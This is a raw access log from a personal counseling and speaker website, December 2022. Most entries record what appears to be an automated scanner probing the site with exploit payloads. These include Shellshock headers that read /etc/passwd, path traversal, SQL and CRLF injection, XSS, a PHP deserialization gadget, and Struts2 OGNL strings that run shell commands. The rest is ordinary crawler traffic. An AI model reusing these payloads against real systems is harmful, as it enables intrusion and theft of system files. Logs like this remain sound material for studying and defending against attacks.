147.182.222.20 - - [07/Dec/2022:21:02:21 -0800] "GET /cgi-bin/status/status.cgi HTTP/1.1" 404 88 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:02:24 -0800] "GET /test.cgi HTTP/1.1" 404 88 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:02:28 -0800] "GET /debug.cgi HTTP/1.1" 404 88 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:02:31 -0800] "GET /cgi-bin/test-cgi HTTP/1.1" 404 88 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:06:02 -0800] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
51.222.253.11 - - [07/Dec/2022:21:08:23 -0800] "GET /private_counseling HTTP/1.1" 200 4498 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:21:10:58 -0800] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 88 "mikemarino.us.p9.hostingprod.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:11:05 -0800] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:11:57 -0800] "POST /dfsms/ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:12:53 -0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:12:58 -0800] "POST /functionRouter HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:13:00 -0800] "POST / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:13:03 -0800] "POST /api/agent/tabs/agentData HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:13:13 -0800] "GET /webadmin/clientlogin/?srid=&action=showdeny&url= HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:13:24 -0800] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:15:52 -0800] "GET /api/experimental/patternfile?order=id%3Bselect(md5(999999999))&page=0&page_size=0 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:17:34 -0800] "GET / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
114.119.148.1 - - [07/Dec/2022:21:28:17 -0800] "GET /speaker/breaking_the_power_of_addiction HTTP/1.1" 200 4778 "https://mikemarino.us/speaker/addictions_-_from_heartbreak_to_hope_galafundraising_keynote" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:21:41:14 -0800] "POST /apply_sec.cgi HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:41:17 -0800] "POST /apply_sec.cgi HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:43:40 -0800] "GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:43:44 -0800] "GET /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
114.119.153.188 - - [07/Dec/2022:21:46:41 -0800] "GET /home HTTP/1.1" 200 4548 "https://www.mikemarino.us/private_counseling" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.mikemarino.us"
114.119.165.136 - - [07/Dec/2022:21:49:03 -0800] "GET /helpful_tips/how_shame_hurts_relationships HTTP/1.1" 200 7274 "https://mikemarino.us/helpful_tips/beating_the_holiday_blues" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:21:52:04 -0800] "GET /html/log HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
3.239.241.39 - - [07/Dec/2022:21:52:45 -0800] "GET /robots.txt HTTP/1.1" 200 59 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" "mikemarino.us"
3.239.241.39 - - [07/Dec/2022:21:52:45 -0800] "GET /contact HTTP/1.1" 200 17847 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:21:53:14 -0800] "GET /api/experimental/latest_runs HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:54:08 -0800] "POST /admin/auth/reset-password HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:54:58 -0800] "GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:55:04 -0800] "GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:55:07 -0800] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:55:20 -0800] "POST /scripts/setup.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:55:22 -0800] "POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
64.124.8.47 - - [07/Dec/2022:22:07:30 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
64.124.8.47 - - [07/Dec/2022:22:07:30 -0800] "GET /robots.txt HTTP/1.1" 304 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:22:16:19 -0800] "POST /ccms/index.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:22:16:23 -0800] "GET /ccms/dashboard.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:22:23:50 -0800] "GET /api/v2/cmdb/system/admin HTTP/1.1" 404 88 "-" "Node.js" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:22:23:54 -0800] "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1" 403 170 "-" "Report Runner" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:22:25:02 -0800] "GET /assets/app/something/services/AppModule.class/ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:22:35:22 -0800] "POST /webtools/control/SOAPService HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:22:36:31 -0800] "POST / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
51.222.253.7 - - [07/Dec/2022:22:36:49 -0800] "GET /author HTTP/1.1" 200 4638 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "mikemarino.us"
51.222.253.8 - - [07/Dec/2022:22:37:01 -0800] "GET /yahoo_site_admin/assets/images/freedom_cover.208105941_std.jpg HTTP/1.1" 200 84376 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "mikemarino.us"
51.222.253.11 - - [07/Dec/2022:22:37:08 -0800] "GET /yahoo_site_admin/assets/images/song_in_you_cover_jpg.69215241_std.jpg HTTP/1.1" 200 113131 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:22:37:14 -0800] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:22:37:21 -0800] "POST /var HTTP/1.1" 404 88 "https://mikemarino.us.p9.hostingprod.com" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:22:37:33 -0800] "GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:22:39:47 -0800] "POST /api/v1/login/oauth2/auth HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:22:41:01 -0800] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:22:41:04 -0800] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:22:48:00 -0800] "POST /ws_utc/resources/setting/options HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:22:48:03 -0800] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:02:29 -0800] "GET /horde/admin/user.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
85.174.204.5 - - [07/Dec/2022:23:02:32 -0800] "GET / HTTP/1.1" 200 19827 "https://mikemarino.us/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:23:02:33 -0800] "GET /admin/user.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:04:05 -0800] "GET /?p=1 HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:05:51 -0800] "GET / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:05:54 -0800] "GET /hw-sys.htm HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:12:17 -0800] "POST /ui/api/v1/ui/auth/login HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:18:41 -0800] "POST /upload HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:19:09 -0800] "POST /login HTTP/1.1" 404 88 "mikemarino.us.p9.hostingprod.com/module/login/login.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:19:18 -0800] "POST /goform/setSysAdm HTTP/1.1" 404 88 "https://mikemarino.us.p9.hostingprod.com/login.shtml" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:19:25 -0800] "GET /i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:19:33 -0800] "POST /mailingupgrade.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:19:44 -0800] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
51.222.253.3 - - [07/Dec/2022:23:20:14 -0800] "GET /helpful_tips HTTP/1.1" 200 4334 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:23:20:15 -0800] "GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
216.244.66.240 - - [07/Dec/2022:23:30:41 -0800] "GET /robots.txt HTTP/1.1" 200 59 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "www.mikemarino.us"
216.244.66.240 - - [07/Dec/2022:23:31:32 -0800] "GET /bio HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "www.mikemarino.us"
111.240.203.249 - - [07/Dec/2022:23:31:46 -0800] "GET /contact/ HTTP/1.1" 200 17847 "https://mikemarino.us/contact/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36" "mikemarino.us"
111.240.203.249 - - [07/Dec/2022:23:31:48 -0800] "GET /contact HTTP/1.1" 200 17847 "https://mikemarino.us/contact" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:23:33:31 -0800] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:33:35 -0800] "GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:33:38 -0800] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:33:42 -0800] "GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:33:45 -0800] "GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:33:49 -0800] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:33:52 -0800] "GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
